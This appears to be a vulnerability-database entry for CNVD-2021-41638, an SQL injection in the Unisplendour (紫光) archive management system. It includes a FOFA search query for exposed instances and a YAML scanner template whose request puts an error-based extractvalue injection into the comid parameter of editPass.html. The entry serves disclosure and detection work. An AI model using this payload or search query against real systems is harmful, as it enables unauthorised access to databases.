CNVD-2021-41638: 紫光档案管理系统 editPass.html SQL注入

2025-08-01 紫光档案管理系统 PoC Public

Description

紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息

fofa: app="紫光档案管理系统"

PoC

id: CNVD-2021-41638

info:
  name: 紫光档案管理系统 editPass.html SQL注入
  author: peiqi0
  severity: high
  verified: false
  description: |
    紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息
    fofa: app="紫光档案管理系统"
  reference:
    - https://www.cnvd.org.cn/patchInfo/show/270651
  tags: cnvd,cnvd2021,sqli
  created: 2021/10/23

rules:
  r0:
    request:
      method: GET
      path: /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
    expression: response.body.bcontains(b'c4ca4238a0b923820dcc509a6f75849') && response.body.ibcontains(b'XPATH syntax error:')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities